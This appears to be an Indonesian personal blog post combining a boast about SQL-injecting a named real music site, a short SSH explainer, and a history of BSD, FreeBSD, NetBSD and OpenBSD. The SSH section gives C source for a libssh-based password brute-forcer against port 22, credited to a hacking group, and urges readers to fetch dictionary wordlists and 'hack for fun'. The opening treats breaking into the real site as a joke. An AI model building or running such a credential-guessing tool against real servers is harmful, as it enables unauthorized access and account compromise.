dan ternyata gw baru tau klo situs www.tembang.com itu termasuk salah satu situs terkenal juga, huh klo tau itu situs terkenal sey mendingan waktu itu gw drop table aja, ups… becanda ding, untuk mas admin dari situs tersebut, tolong di perbaiki lagi situs’a dunk, lagian setelah di perbaiki ko masih bisa yach di inject lagi mpe kluar error page yg ngasih informasi berharga’a, klo bisa jangan ½² doank betulin’a, coba di filter validasi input’a dunk mas admin

maaf bukan maksud menggurui tapi hanya mengingatkan mas admin doank, dan saya yakin situ lebih jago dan lebih hebat dari saya

dan taukah anda, ternyata saya mendapatkan juga lagu paramitha rusady yg judul’a penglihatan dari multiply, duh klo lagi nyetel lagu itu jadi inget sore itu di kosan sarah, sedih gw klo inget² itu lagi, mudah²an kamu bahagia yach sarah di sana…

Apa itu SSH ?

SSH atau secure shell adalah aplikasi pengganti remote login seperti telnet, rsh, dan rlogin semacam dengan vnc atau remote desktop, yang jauh lebih aman. Beda’a ssh digunakan buat meremote komputer secara command line interface (text mode) atau dengan lebih jelas’a seperti bermain dengan command prompt pada operating system windows sehingga kinerja’a tentu akan lebih cepat dan gesit.

Dikembangkan pertamakali oleh OpenBSD project dan kemudian versi rilis p (port) di manage oleh team porting ke sistem operasi lain’a, termasuk sistem operasi Linux. Fungsi utama aplikasi ini adalah untuk mengakses mesin secara remote

Dengan SSH, semua percakapan antara server dan klien di enkripsi. Arti’a, apabila percakapan tersebut disadap, penyadap tidak mungkin memahami isi’a. Bayangkan klo seandai’a lo lagi maintenance server dari jauh, tentu’a dengan account yang punya hak khusus, tanpa sepengetahuan lo, account dan password tersebut disadap orang lain, kemudian server lo diobrak-abrik

Algoritma enkripsi yang didukung oleh SSH di antara’a BlowFish (BRUCE SCHNEIER), Triple DES (Pengembangan dari DES oleh IBM), IDEA (The International Data Encryption Algorithm), dan RSA (The Rivest-Shamir-Adelman). Dengan berbagai metode enkripsi yang didukung oleh SSH, lo bisa mengganti’a dengan cepat klo salah satu algoritma yang lo bikin mengalami gangguan

Gw pikir pasti lo berpikir klo SSH itu ga bisa di crack, klo lo berpikir seperti itu lo salah besar !! ingatlah kawan, bahwa ga ada system yang aman 100%, semua buatan manusia pasti ada kelemahan’a, klo kata temen gw anak surabayahackerlink banyak jalan untuk menuju neraka hei sobat

Kita lakukan dengan teknik brute force, gw harap istilah brute force dan password guessing ga perlu lagi dipermasalahin, bagi yang belom tau apa itu brute force or password guessing silakan cari sendiri pengertian’a di ma²ng google

Bahan yang di perlukan:
1. Rokok sampoerna mild 1 bungkus
2. Teh Botol 1 krat
3. Snack and music player, buat cemilan klo lagi stuck
4. Dictionary attack, download aja di situs² hacker
5. Komputer pasti’a, lah klo gada ini mo cracking pake kompor?
6. libssh.h silakan cari lagi di ma²ng google

sedikit source code dari libssh.h buat contoh aja :

#define AUTH_SUCCESS 0

/* in client.c */

SSH_SESSION *ssh_connect(SSH_OPTIONS *options);
void ssh_disconnect(SSH_SESSION *session);

/* in options.c */

SSH_OPTIONS *ssh_getopt(int *argcptr, char **argv);
void options_set_username(SSH_OPTIONS *opt,char *username);
void options_set_host(SSH_OPTIONS *opt, const char *host);
void options_set_port(SSH_OPTIONS *opt, unsigned int port);

/* in auth.c */

int ssh_userauth_password(SSH_SESSION *session,char *username,char *password);

sisa’a compile sendiri pk gcc dan cari sendiri file libssh.h dan file² *.c yang dibutuhin. Sekarang tinggal mengimplementasikan fungsi² diatas pada ssh brute force yang bakal kita rakit code’a

#include
#include
#define PORT 22

void checkauth(char *user, char *password, char *host)
{
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={”none”};

options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
options_set_port(options,PORT);
session=ssh_connect(options);
if(!session) return ;

if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
printf(”%s:%s:%s -> BaD Password\n”,user,password,host);
ssh_disconnect(session);
return;
}else{
printf(”%sManteb juragan.Coba ini : %s:%s:%s\n”,warn,user,password,host);
}
}

Let’s compile and hack for fun !!

Source code from kecoak team

BSD Story

WeeiitttzZz ntar dolo, ini bukan sejarah dari bumi serpong damai, gila kale lo ye !! BSD yang gw maksud disini adalah operating system turunan unix, yeah gw juga salah satu user dari BSD ini khusus’a FreeBSD, abis’a gw dah bosen maen pake windows, masa dari gw kecil mpe kuliah masih aja gada peningkatan’a, 0.k dey daripada cincay molo mendingan liat ulasan the true story’a aja dey

Story

Sekitar pertengahan 1970, AT&T mulai memperkenalkaan dan melisensikan sistem operasi baru bernama Unix. Dengan sedikit atau tanpa biaya, orang-orang dan organisasi dapat memperoleh source code sistem baru tersebut.

Ketika University of California at Berkeley menerima source code ini (membeli dengan harga $400), co-creator Unix, Ken Thompson, tengah berkunjung ke salah satu fakultas. Melalui bantuannya yang konsisten, para periset dan mahasiswa, terutama Bill Joy (salah satu pendiri Sun Microsystem), berusaha mengembangkan source code Unix tersebut dan melahirkan apa yang disebut The Berkeley Software Distribution (BSD).

Dengan dukungan pendanaan dari DARPA (departemen pertahanan Amerika), Berkeley Computer System Research Group (CSRG) selanjutnya menjadi bagian penting dalam pengembangan Unix disamping Bell Labs. Bersamaan dengan Unix System V AT&T sendiri, BSD tumbuh menjadi salah satu dari dua flavor Unix mayor pada saat itu.

Faktanya, sistem Unix BSD berkembang lebih inovatif dari Unix System V. Ia lebih digemari oleh kalangan akademik dan institusi-institusi riset daripada perusahaan komersial.

Seiring bergulirnya waktu, Unix BSD sangat mempengaruhi perkembangan sistem-sistem Unix yang ada saat ini. Berbagai utiliti dasar Unix, seperti C-shell, vi, TCP/IP, dan virtual memory, dibuat pertama kali pada rilis Unix BSD. Sun Microsystem SunOS termasuk turunan dari 4.2BSD, sedangkan Unix System V ditulis-ulang dalam rilis ke-empatnya (SVR4) untuk menyesuaikan diri dengan fitur-fitur BSD. Dengan demikian, langsung maupun tidak langsung, unix BSD memberikan kontribusi yang besar terhadap perkembangan Unix dewasa ini.

Versi modern BSD adalah 4.4BSD yang dirilis pada tahun 1993. Kebanyakan sistem-sistem BSD saat ini berstandarkan 4.4BSD-Lite.

Di antara sekian banyak flavor Unix BSD, terdapat tiga sistem freeware yang populer digunakan, yaitu:
* FreeBSD
* NetBSD
* OpenBSD

FreeBSD

Sekitar tahun 1992 dan 1993, Jordan K. Hubbard, Rod Grimes, dan Nate Williams bekerja pada proyek 386BSD dan merilis set perubahan-perubahan yang dikenal dengan “Unofficial 386BSD Patchkit.”

Perawatan patchkit dirasa menemui jalan buntu sehingga suatu mekanisme baru dibutuhkan. Ketiga author akhirnya memulai proyek baru yang dinamakan “386BSD 0.5″, didalamnya termuat berbagai utiliti perbaikan (fixes) dan fungsi-fungsi lainnya sebagaimana layaknya sebuah sistem operasi riil. Sayangnya tak lama kemudian proyek tersebut terhenti.

David Greenman, yang kemudian bekerja pada Walnut Creek, selanjutnya mengusulkan sistem operasi baru berbasiskan kepada patchkit yang telah ada dengan nama FreeBSD.

Segera setelah itu, Hubbard dikontrak Walnut Creek untuk mempersiapkan channel distribusi CDROM. Walnut Creek memberikan dukungan dengan menawarkan server dan hardware ber-bandwidth tinggi untuk mengembangkannya. CDROM pertama dari FreeBSD adalah versi 1.0, dirilis pada bulan Desember 1993.

FreeBSD 2.0 dirilis bulan November 1994. Selanjutnya sebagai upgrade dan peningkatan dilakukan secara berkesinambungan dan signifikan. Dewasa ini FreeBSD telah melahirkan rilis-rilis yang sangat stabil dan luas digunakan oleh masyarakat dunia. Yahoo!, direktori internet terbesar saat ini, mempercayakan jutaan halamannya untuk dilayani oleh sistem FreeBSD, begitu pula organisasi dan vendor-vendor besar lainnya.

Berdasarkan penuturan Hubbard, sasaran utama FreeBSD Project adalah memberikan software yang dapat digunakan untuk beragam tujuan.

Barangkali apa yang menarik dari FreeBSD adalah sisi teknisnya yang simpel. Diakui bahwa program instalasi FreeBSD termasuk dalam tool instalasi Unix yang paling sederhana di antara yang lainnya. Di samping itu, sistem software third-party yang datang bersamanya (Port Collections) telah diadopsi NetBSD dan OpenBSD. Fitur tersebut memberikan kemudahan yang berarti bagi para user untuk menambah atau menghapus aplikasi-aplikasi sebagaimana yang mereka kehendaki. Para user cukup mengeksekusi satu baris perintah dan aplikasi-aplikasi dengan sendirinya di-download, dicek integritasnya, di-build, dan diinstall secara otomatis. Tugas-tugas administrasi sistem menjadi sangat praktis dan mudah.

Model pengembangan FreeBSD nyaris serupa dengan NetBSD maupun OpenBSD, tetapi memiliki perbedaan yang signifikan dengan development Linux. Model pengembangan FreeBSD dikelola secara profesional oleh ratusan programmer individual yang dipanggil dengan Committers. Commiters berwenang melakukan perubahan-perubahan yang dibutuhkan terhadap source official FreeBSD kapan pun juga. Penyeleksian tim Commiters diputuskan oleh FreeBSD Core Team, yang merupakan papan direksi FreeBSD.

Model pengembangan FreeBSD diarahkan untuk menciptakan produk yang stabil dan mudah digunakan. Sebagai salah satu sistem Unix yang reliabel untuk platform x86, FreeBSD harus menjaga kompatibilitas program-program sebaik mungkin di antara sistem.

NetBSD

Ketika Jolitz dan rekan-rekan lain memfokuskan diri dalam proyek 386BSD, mereka menemui kendala dalam pengerjaannya dan karena itu mulai mengembangkan usaha paralel. Rekan-rekan di Virginia Tech selanjutnya mulai mem-porting BSD ke Macintosh. Usaha terus dikembangkan ke arsitektur lainnya seperti Atari ST, Amiga, dan berbagai platform PC.

Fokus pengembangan NetBSD adalah berusaha memberikan sitem operasi yang stabil, multiplatform, dan berorientasi-riset. Pada Januari 2001, portabilitas NetBSD dikabarkan sudah mencapai 33 Platform.

Lebih menakjubkan lagi, NetBSD mendukung segudang hardware dan perlengkapan modern maupun tradisional, termasuk perlengkapan berbasis PC Intel, Compaq’s Alpha, atau arsitektur Sun Microsystem SPARC. Server tua dan hardware kelas workstation seperti Digital Equipment Corporation (DEC) VAX, komputer Apple Macintosh berbasis prosesor Motorola 68000 juga didukung.

Dedikasi NetBSD atas portabilitasnya telah memimpin sistem-sistem operasi lain. Pada saat grup FreeBSD mulai mem-porting sistemnya ke platform Alpha, pekerjaan pada proyek NetBSD dijadikan landasan. Demikian juga Linux telah mengambil keuntungan dari pengalaman NetBSD. Utiliti boot-loader spesial yang digunakan NetBSD untuk komputer-komputer Macintosh seri 68000 dimodifikasi sedemikian rupa dan menjadi boot-loader Penguin yang digunakan untuk me-launch Linux dalam mesin-mesin tersebut.

Akhirnya, kontribusi besar NetBSD lainnya adalah sebagai ‘batu loncatan’ atas lahirnya sistem operasi OpenBSD.

The NetBSD Project bercita-cita melahirkan sistem operasi riset kelas dunia yang andal. Oleh karena portabilitas NetBSD terhadap beragam hardware sangat terbuka, sekolah dan institusi-institusi riset dapat mewujudkan riset nyata melalui perlengkapan-perlengkapan yang tersedia.

Proyek mayor lainnya yang dikembangkan oleh NetBSD adalah KAME. KAME membantu memperkenalkan IPv6, IPsec (baik untuk IPv4 dan IPv6), dan peningkatan-peningkatan TCP/IP secara umum dalam dunia Unix.

NetBSD merupakan sistem yang cerdas. Datang dengan komplemen lengkap atas tool-tool Unix, dan banyak situs menggunakan NetBSD sebagai server DNS atau server jaringan mereka, terutama karena portabilitasnya yang luas terhadap beragam hardware dan perlengkapan.

OpenBSD

Pada awal tahun 1990-an, Theo de Raadt memegang tanggung jawab terhadap porting SPARC dalam NetBSD dan bagian-bagian lainnya. Akan tetapi, karena adanya kesalahpahaman antara Theo dan tim inti NetBSD berkaitan dengan arah pengembangan NetBSD, Theo mengundurkan diri dan selanjutnya merilis OpenBSD.

OpenBSD sedikit ‘menyimpang’ dari NetBSD sekitar rilis NetBSD 1.1 pada November 1995. Rilis pertama OpenBSD datang setahun kemudian, berikutnya OpenBSD 2.0 dirilis bulan Oktober 1996.

Apabila NetBSD memiliki keunikan dengan portabilitas yang luas, OpenBSD memfokuskan diri pada ketangguhan sistem dan keamanan. ‘Mantera’ OpenBSD yang berbunyi “Secure-by-default” telah menghasilkan produk sistem operasi yang paling sempurna saat ini. OpenBSD mengklaim bahwa tiga tahun tanpa exploitasi remote root memungkinkan administrator-administrator sistem dapat tidur nyenyak sepanjang malam.

Mengambil keuntungan dari domisilinya di Kanada, misi de Raadt tidak terhambat oleh hukum Amerika, dimana penerapan algoritma kriptografi yang kuat (strong cryptography) sangat dimungkinkan, seperti RSA, Blowfish, dan sejumlah algoritma lainnya. Lebih dari itu, versi modifikasi algoritma Blowfish sekarang digunakan untuk mengenkripsi password user.

Developer OpenBSD tidak hanya berhenti disitu, satu sumbangsih lain dari kerja keras mereka adalah OpenSSH, yakni clone multiplatform protokol terpopuler untuk mewujudkan komunikasi-komunikasi yang aman.

Fitur lain dari OpenBSD adalah auditing pengkodean yang teliti, hati-hati, dan apik. Itu semua untuk menjamin keamanan sistem yang bisa dipercaya. Dimulai sejak 1996, tim OpenBSD melakukan analisis baris-demi-baris pada keseluruhan konstruksi sistem operasi dengan mencari peluang atas berbagai hole security dan bug potensial.

Sistem-sistem Unix cukup terganggu dengan apa yang disebut fixed-sized buffers. Disamping tidak familier bagi para programmer, mereka juga mengaeah pada lahirnya hole security, seperti apa yang terjaadi pada eksploitasi fingerd dalam 4.2BSD.

Keseriusannya dalam pengawasan keamanan menyebabkan tim OpenBSD kerap menemukan kelemahan-kelemahan yang berhubungan dengan keamanan pada berbagai sistem operasi lain atau aplikasi-aplikasi third-party, termasuk pada sistem FreeBSD, NetBSD, atau yang lainnya.

Kebanyakan jaminan keamanan diwujudkan dengan audit code secara berkesinambungan dan OpenBSD tidak mentolerir berbagai port jaringan terbuka dalam instalasi default-nya. Seandainya sebuah situs memerlukan akses ke protokol finger, lpd, atau protokol-protokol lainnya, mereka terlebih dahulu harus di aktifkan. Lazimnya, protokol-protokol harus nonaktif saat tidak digunakan, dan instalasi OpenBSD mempertimbangkan hal itu dengan seksama.

OpenBSD termasuk sistem operasi yang portabel. Mungkin itu terpengaruh oleh karakteristik NetBSD sebagai ‘garis keturunannya’. OpenBSD cukup stabil dalam lusinan arsitektur, termasuk platform PC berbasis Intel, Motorola 68k-based Macintosh, dan lain-lain.


Venom's blpg

+++

Share |

"make something then You never be lost"

wibiya widget